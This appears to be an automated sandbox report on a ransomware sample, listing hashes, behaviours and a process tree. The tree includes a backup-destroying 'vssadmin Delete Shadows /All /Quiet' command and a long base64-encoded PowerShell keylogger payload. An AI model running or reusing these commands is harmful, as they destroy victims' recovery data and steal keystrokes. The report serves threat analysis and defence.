f7c1423cc7223b0490b8e98cb656a09eef624c9d0e1f00445031b1c635692b5d

Analysis

max time kernel
158s
max time network
94s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
22/11/2022, 03:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bb90548c9c0dd6e411c236b55004a392.exe
Size

388KB
MD5

bb90548c9c0dd6e411c236b55004a392
SHA1

1e1db20778c735c26ac2411fa565a1ff43405327
SHA256

f7c1423cc7223b0490b8e98cb656a09eef624c9d0e1f00445031b1c635692b5d
SHA512

12ba06a936605a3ec6873489c863b1e922e2f989d4cab5c73936f6e9699e6a6760a8c001cfbe2ad7cad007b573f563fbea74125abc547eda409403cc4cf05231
SSDEEP

6144:pOYGXaPNxdgSdcq2pVZPOJHAbKSXXDYrM2Vfmq7k3ivPjVbdgZK:1GqN/XdctpVtkiXXDCOZij3Z

Score

10^/10

ransomware

Malware Config

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	664	1356	wscript.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	632	1356	powershell.exe	30

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	664	wscript.exe

Deletes itself 1 IoCs

pid	Process
1780	wscript.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1736	vssadmin.exe

Modifies registry class 4 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinNT	wscript.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
632	powershell.exe
632	powershell.exe
632	powershell.exe
632	powershell.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1780	wscript.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeBackupPrivilege	1564	vssvc.exe
Token: SeRestorePrivilege	1564	vssvc.exe
Token: SeAuditPrivilege	1564	vssvc.exe
Token: SeDebugPrivilege	632	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
632	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 1772 wrote to memory of 1780	1772	bb90548c9c0dd6e411c236b55004a392.exe	28
PID 1772 wrote to memory of 1780	1772	bb90548c9c0dd6e411c236b55004a392.exe	28
PID 1772 wrote to memory of 1780	1772	bb90548c9c0dd6e411c236b55004a392.exe	28
PID 1772 wrote to memory of 1780	1772	bb90548c9c0dd6e411c236b55004a392.exe	28
PID 1780 wrote to memory of 1736	1780	wscript.exe	32
PID 1780 wrote to memory of 1736	1780	wscript.exe	32
PID 1780 wrote to memory of 1736	1780	wscript.exe	32
PID 1780 wrote to memory of 1736	1780	wscript.exe	32
PID 632 wrote to memory of 1440	632	powershell.exe	37
PID 632 wrote to memory of 1440	632	powershell.exe	37
PID 632 wrote to memory of 1440	632	powershell.exe	37
PID 1440 wrote to memory of 1992	1440	csc.exe	38
PID 1440 wrote to memory of 1992	1440	csc.exe	38
PID 1440 wrote to memory of 1992	1440	csc.exe	38

C:\Users\Admin\AppData\Local\Temp\bb90548c9c0dd6e411c236b55004a392.exe
"C:\Users\Admin\AppData\Local\Temp\bb90548c9c0dd6e411c236b55004a392.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1772
- C:\Windows\SysWOW64\wscript.exe
  "C:\Windows\System32\wscript.exe" 2815614063.js 32 "C:\Users\Admin\AppData\Local\Temp\bb90548c9c0dd6e411c236b55004a392.exe"
  2⤵
  - Deletes itself
  - Modifies registry class
  - Suspicious behavior: RenamesItself
  - Suspicious use of WriteProcessMemory
  PID:1780
- - C:\Windows\SysWOW64\vssadmin.exe
    "C:\Windows\System32\vssadmin.exe" Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1736

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\dae2938e0.js" 32
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies registry class
PID:664

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc QQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEkATwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEEAYwBjAGUAcwBzAEMAbwBuAHQAcgBvAGwAOwBuAGEAbQBlAHMAcABhAGMAZQAgAGoAMQB7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABkADIAewBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABqADMAIABiADQAIAA9ACAAagA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAagA2ACAAZQA3ACAAPQAgAGoAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAbwA5ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABoADEAMAAgAG0AMQAxADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAHAAMQAyADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGIAMQAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGsAMQA0ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGkAMQA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGoAMQA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGUAMQA3ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABwADEAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAaAAxADkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGwAMgAwADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABoADIAMQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAbwAyADIAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGMAMgAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABlADIANAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYwAyADUAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGUAMgA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABrADIANwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGIAMgA4AHsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAGwAMgA5ADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGEAMwAwADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGYAMwAxADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGwAMwAyADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGwAMwAzADsAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBCAHkAVgBhAGwAQQByAHIAYQB5ACwAIABTAGkAegBlAEMAbwBuAHMAdAAgAD0AIAAzADYAKQBdAHAAdQBiAGwAaQBjACAAYgB5AHQAZQBbAF0AIABkADMANAA7AH0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIABSAHUAbgAoAGgAMQAwACAAagAzADUAKQB7AG0AMQAxACAAPQAgAGoAMwA1ADsAZQAxADcAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGgAMQA5ACAAPQAgACIAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwBcAFwARABXAE0AIgA7AGwAMgAwACAAPQAgACIASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAXAAiACAAKwAgAGgAMQA5ADsAZQAyADYAIAA9ACAARQBuAHYAaQByAG8AbgBtAGUAbgB0AC4ARwBlAHQARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQByAGkAYQBiAGwAZQAoACIAXwBfAFUASQBEAF8ARQBOAFYAXwBWAEEAUgBfAF8AIgApADsAaQBmACAAKABlADIANgAgAD0APQAgAG4AdQBsAGwAKQAgAGUAMgA2ACAAPQAgACIAMQAyADMANAA1ADYANwA4ACIAOwBoADIAMQAgAD0AIABlADIANgAgACsAIAAiAGEAIgA7AG8AMgAyACAAPQAgAGUAMgA2ACAAKwAgACIAZAAiADsAYwAyADMAIAA9ACAAZQAyADYAIAArACAAIgBzACIAOwBlADIANAAgAD0AIABlADIANgAgACsAIAAiAG0AIgA7AHUAaQBuAHQAIABuADMANgAgAD0AIABPAHAAZQBuAE0AdQB0AGUAeAAoADAAeAAwADAAMQAwADAAMAAwADAALAAgAGYAYQBsAHMAZQAsACAAZQAyADQAKQA7AGkAZgAgACgAbgAzADYAIAAhAD0AIAAwACkAIABFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAAwACkAOwBDAHIAZQBhAHQAZQBNAHUAdABlAHgAKABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgAHQAcgB1AGUALAAgAGUAMgA0ACkAOwBrADIANwAgAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AOwBpAGYAIAAoAFMAQwBhAHIAZABFAHMAdABhAGIAbABpAHMAaABDAG8AbgB0AGUAeAB0ACgAMgAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgAG8AdQB0ACAAawAyADcAKQAgACEAPQAgADAAKQAgAGsAMgA3ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAMQA4ACAAPQAgACIAIgA7AGIAMQAzACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAaQBuAHQAIABqADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAYgAxADMAKQA7AGoAMQA2ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoAGoAMwA3ACAAKwAgADEAKQA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKABiADEAMwAsACAAagAxADYALAAgAGoAMwA3ACAAKwAgADEAKQA7AHUAaQBuAHQAIABrADEANAAgAD0AIAAwADsARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABiADEAMwAsACAAcgBlAGYAIABrADEANAApADsAUAByAG8AYwBlAHMAcwAgAGgAMwA4ACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAawAxADQAKQA7AGkAZgAgACgAaAAzADgAIAAhAD0AIABuAHUAbABsACkAIABjADIANQAgAD0AIABoADMAOAAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7ACAAZQBsAHMAZQAgAGMAMgA1ACAAPQAgACIAIgA7AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIAAwACwAIABlADcALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAAMAAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACkAOwBvADkAIAA9ACAAYQAzADkAKABiADQAKQA7AEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFIAdQBuACgAKQA7AFUAbgBoAG8AbwBrAFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKABvADkAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABhADMAOQAoAGoAMwAgAGIANAApAHsASQBuAHQAUAB0AHIAIABwADQAMAAgAD0AIABHAGUAdABNAG8AZAB1AGwAZQBIAGEAbgBkAGwAZQAoAFAAcgBvAGMAZQBzAHMALgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAE0AbwBkAHUAbABlAE4AYQBtAGUAKQA7AHIAZQB0AHUAcgBuACAAUwBlAHQAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoADEAMwAsACAAYgA0ACwAIABwADQAMAAsACAAMAApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIAB2AG8AaQBkACAAbQA0ADEAKABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAZgA0ADIALAAgAHMAdAByAGkAbgBnACAAZAA0ADMALAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABjADQANAApAHsAdAByAHkAewBzAHQAcgBpAG4AZwAgAGUANAA1AGQAYQB0AGEAXwAgAD0AIABSAGUAZwBpAHMAdAByAHkALgBHAGUAdABWAGEAbAB1AGUAKABsADIAMAAsACAAaAAyADEALAAgACIAIgApAC4AVABvAFMAdAByAGkAbgBnACgAKQA7AGUANAA1AGQAYQB0AGEAXwAgAD0AIABlADQANQBkAGEAdABhAF8AIAArACAARABhAHQAZQBUAGkAbQBlAC4ATgBvAHcAIAArACAAIgAgAFsAIgAgACsAIABmADQAMgAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAIgBdACAALQAgACIAIAArACAAZAA0ADMAIAArACAAIgBcAHIAXABuACIAIAArACAAYwA0ADQALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIAXAByAFwAbgBcAHIAXABuACIAOwBSAGUAZwBpAHMAdAByAHkALgBTAGUAdABWAGEAbAB1AGUAKABsADIAMAAsACAAaAAyADEALAAgAGUANAA1AGQAYQB0AGEAXwApADsAfQBjAGEAdABjAGgAIAB7ACAAfQB9AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGkAbgB0ACAAaAA0ADYAKABJAG4AdABQAHQAcgAgAGUANAA3ACkAewByAGUAdAB1AHIAbgAgAE0AYQByAHMAaABhAGwALgBSAGUAYQBkAEkAbgB0ADMAMgAoAGUANAA3ACkAOwB9AHAAcgBpAHYAYQB0AGUAIABkAGUAbABlAGcAYQB0AGUAIABJAG4AdABQAHQAcgAgAGoAMwAoAGkAbgB0ACAAZgA0ADgALAAgAEkAbgB0AFAAdAByACAAcAA0ADkALAAgAEkAbgB0AFAAdAByACAAaQA1ADAAKQA7AHAAdQBiAGwAaQBjACAAZABlAGwAZQBnAGEAdABlACAAdQBpAG4AdAAgAGoANgAoAEkAbgB0AFAAdAByACAAcABQAGEAcgBhAG0AKQA7AHAAdQBiAGwAaQBjACAAZABlAGwAZQBnAGEAdABlACAAdgBvAGkAZAAgAGgAMQAwACgAKQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAagA1ACgAaQBuAHQAIABmADQAOAAsACAASQBuAHQAUAB0AHIAIABwADQAOQAsACAASQBuAHQAUAB0AHIAIABpADUAMAApAHsAaQBmACAAKABmADQAOAAgAD4APQAgADAAIAAmACYAIABwADQAOQAgAD0APQAgACgASQBuAHQAUAB0AHIAKQAwAHgAMAAxADAAMAApAHsAaQBuAHQAIABuADUAMQAgAD0AIABoADQANgAoAGkANQAwACkAOwBpAGYAIAAoAG4ANQAxACAAPAAgADgAKQAgAHIAZQB0AHUAcgBuACAAQwBhAGwAbABOAGUAeAB0AEgAbwBvAGsARQB4ACgAbwA5ACwAIABmADQAOAAsACAAcAA0ADkALAAgAGkANQAwACkAOwBtADEAMQAoACkAOwBiAG8AbwBsACAAbAA1ADIAIAA9ACAAKABuADUAMQAgAD0APQAgADgAKQA7AGIAbwBvAGwAIABqADUAMwAgAD0AIAAoAG4ANQAxACAAPQA9ACAANAA2ACkAOwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAcAA1ADQAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGIAeQB0AGUAWwBdACAAaAA1ADUAIAAgAD0AIABuAGUAdwAgAGIAeQB0AGUAWwAyADUANQBdADsAaQBmACAAKABHAGUAdABLAGUAeQBiAG8AYQByAGQAUwB0AGEAdABlACgAaAA1ADUAKQApAHsAdQBpAG4AdAAgAG4ANQA2ACAAPQAgAE0AYQBwAFYAaQByAHQAdQBhAGwASwBlAHkAKABuADUAMQAsACAAMwApADsAcAAxADIAIAA9ACAARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwB1AGkAbgB0ACAAbgA1ADcAIAA9ACAAMAA7AHUAaQBuAHQAIABiADUAOAAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGgAcgBlAGEAZABQAHIAbwBjAGUAcwBzAEkAZAAoAHAAMQAyACwAIAByAGUAZgAgAG4ANQA3ACkAOwB1AGkAbgB0ACAAbQA1ADkAIAA9ACAARwBlAHQASwBlAHkAYgBvAGEAcgBkAEwAYQB5AG8AdQB0ACgAYgA1ADgAKQA7AGkAZgAgACgAbAA1ADIAIAB8AHwAIABqADUAMwAgAHwAfAAgACgAVABvAFUAbgBpAGMAbwBkAGUARQB4ACgAbgA1ADEALAAgAG4ANQA2ACwAIABoADUANQAsACAAcAA1ADQALAAgAHAANQA0AC4AQwBhAHAAYQBjAGkAdAB5ACwAIAAoAHUAaQBuAHQAKQAwACwAIABtADUAOQApACAAPgAgADAAKQApAHsAaQBuAHQAIABqADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAcAAxADIAKQA7AGkAMQA1ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoAGoAMwA3ACAAKwAgADEAKQA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKABwADEAMgAsACAAaQAxADUALAAgAGoAMwA3ACAAKwAgADEAKQA7AGkAZgAgACgAKABuADUANwAgACEAPQAgAGsAMQA0ACkAIAB8AHwAIAAoAHAAMQAyACAAIQA9ACAAYgAxADMAKQAgAHwAfAAgACgAagAxADYALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAIQA9ACAAaQAxADUALgBUAG8AUwB0AHIAaQBuAGcAKAApACkAKQB7AG0ANAAxACgAagAxADYALAAgAGMAMgA1ACwAIABlADEANwApADsAagAxADYALgBSAGUAbQBvAHYAZQAoADAALAAgAGoAMQA2AC4ATABlAG4AZwB0AGgAKQA7AGoAMQA2AC4AQQBwAHAAZQBuAGQAKABpADEANQApADsAZQAxADcALgBSAGUAbQBvAHYAZQAoADAALAAgAGUAMQA3AC4ATABlAG4AZwB0AGgAKQA7AGIAMQAzACAAPQAgAHAAMQAyADsAUAByAG8AYwBlAHMAcwAgAGgAMwA4ACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAbgA1ADcAKQA7AGkAZgAgACgAaAAzADgAIAAhAD0AIABuAHUAbABsACkAIABjADIANQAgAD0AIABoADMAOAAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7ACAAZQBsAHMAZQAgAGMAMgA1ACAAPQAgACIAIgA7AGsAMQA0ACAAPQAgAG4ANQA3ADsAfQBpAGYAIAAoAG4ANQAxACAAPgAgADcAKQB7AGkAZgAgACgAbAA1ADIAKQAgAGUAMQA3AC4AQQBwAHAAZQBuAGQAKAAiAFsAqwBdACIAKQA7AGUAbABzAGUAIABpAGYAIAAoAGoANQAzACkAIABlADEANwAuAEEAcABwAGUAbgBkACgAIgBbAGQAZQBsAF0AIgApADsAZQBsAHMAZQAgAGUAMQA3AC4AQQBwAHAAZQBuAGQAKABwADUANAApADsAfQB9AH0AfQByAGUAdAB1AHIAbgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAG8AOQAsACAAZgA0ADgALAAgAHAANAA5ACwAIABpADUAMAApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABMAGkAcwB0ADwAcwB0AHIAaQBuAGcAPgAgAGgANgAwACgAYgB5AHQAZQBbAF0AIABtADYAMQApAHsAcwB0AHIAaQBuAGcAIABuADYAMgAgAD0AIABFAG4AYwBvAGQAaQBuAGcALgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAG0ANgAxACkAOwBpAGYAIAAoAHMAdAByAGkAbgBnAC4ASQBzAE4AdQBsAGwATwByAEUAbQBwAHQAeQAoAG4ANgAyACkAKQAgAHIAZQB0AHUAcgBuACAAbgBlAHcAIABMAGkAcwB0ADwAcwB0AHIAaQBuAGcAPgAoACkAOwByAGUAdAB1AHIAbgAgAG4AZQB3ACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AKABuADYAMgAuAFMAcABsAGkAdAAoAG4AZQB3ACAAYwBoAGEAcgBbAF0AIAB7ACAAJwBcADAAJwAgAH0ALAAgAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAC4AUgBlAG0AbwB2AGUARQBtAHAAdAB5AEUAbgB0AHIAaQBlAHMAKQApADsAfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIAB1AGkAbgB0ACAAagA4ACgASQBuAHQAUAB0AHIAIABmADYAMwApAHsAYgBvAG8AbAAgAGgANgA0ACAAPQAgAHQAcgB1AGUAOwBzAHQAcgBpAG4AZwAgAGQANgA1ADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGsANgA2ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwB3AGgAaQBsAGUAIAAoAGgANgA0ACkAewBzAHQAcgBpAG4AZwAgAGwANgA3ACAAPQAgAFIAZQBnAGkAcwB0AHIAeQAuAEcAZQB0AFYAYQBsAHUAZQAoAGwAMgAwACwAIABjADIAMwAsACAAIgAiACkALgBUAG8AUwB0AHIAaQBuAGcAKAApADsAaQBmACAAKABsADYANwAgACEAPQAgACIAIgApAHsAUgBlAGcAaQBzAHQAcgB5AEsAZQB5ACAAawA2ADgAIAA9ACAAUgBlAGcAaQBzAHQAcgB5AC4AQwB1AHIAcgBlAG4AdABVAHMAZQByAC4ATwBwAGUAbgBTAHUAYgBLAGUAeQAoAGgAMQA5ACwAIAB0AHIAdQBlACkAOwBpAGYAIAAoAGsANgA4ACAAIQA9ACAAbgB1AGwAbAApAHsAawA2ADgALgBEAGUAbABlAHQAZQBWAGEAbAB1AGUAKABjADIAMwApADsAawA2ADgALgBDAGwAbwBzAGUAKAApADsAfQBFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAAwACkAOwB9AGkAZgAgACgAQwBsAGkAcABiAG8AYQByAGQALgBDAG8AbgB0AGEAaQBuAHMAVABlAHgAdAAoACkAIAA9AD0AIAB0AHIAdQBlACkAewBkADYANQAgAD0AIABDAGwAaQBwAGIAbwBhAHIAZAAuAEcAZQB0AFQAZQB4AHQAKAApADsAaQBmACAAKABkADYANQAgACEAPQAgAHAAMQA4ACkAewBzAHQAcgBpAG4AZwAgAHAANgA5ACAAPQAgACIAIgA7AFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABrADcAMAAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKAApADsAcAAxADIAIAA9ACAARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwBpAGYAIAAoAHAAMQAyACAAIQA9ACAAMAApAHsAaQBuAHQAIABqADMANwAgAD0AIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0AEwAZQBuAGcAdABoACgAcAAxADIAKQA7AGsANwAwAC4AQwBhAHAAYQBjAGkAdAB5ACAAPQAgAGoAMwA3ACAAKwAgADEAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAcAAxADIALAAgAGsANwAwACwAIABqADMANwAgACsAIAAxACkAOwB1AGkAbgB0ACAAXwBwAHIAbwBjAF8AaQBkAF8AIAA9ACAAMAA7AGkAZgAgACgARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABwADEAMgAsACAAcgBlAGYAIABfAHAAcgBvAGMAXwBpAGQAXwApACAAIQA9ACAAMAApAHsAUAByAG8AYwBlAHMAcwAgAGcANwAxACAAPQAgAFAAcgBvAGMAZQBzAHMALgBHAGUAdABQAHIAbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAXwBwAHIAbwBjAF8AaQBkAF8AKQA7AGkAZgAgACgAZwA3ADEAIAAhAD0AIABuAHUAbABsACkAIABwADYAOQAgAD0AIABnADcAMQAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7AH0AfQBrADcAMAAuAEEAcABwAGUAbgBkACgAIgAgADoAOgAgAEMAbABpAHAAYgBvAGEAcgBkACIAKQA7AGsANgA2AC4AUgBlAG0AbwB2AGUAKAAwACwAIABrADYANgAuAEwAZQBuAGcAdABoACkAOwBrADYANgAuAEEAcABwAGUAbgBkACgAZAA2ADUAKQA7AG0ANAAx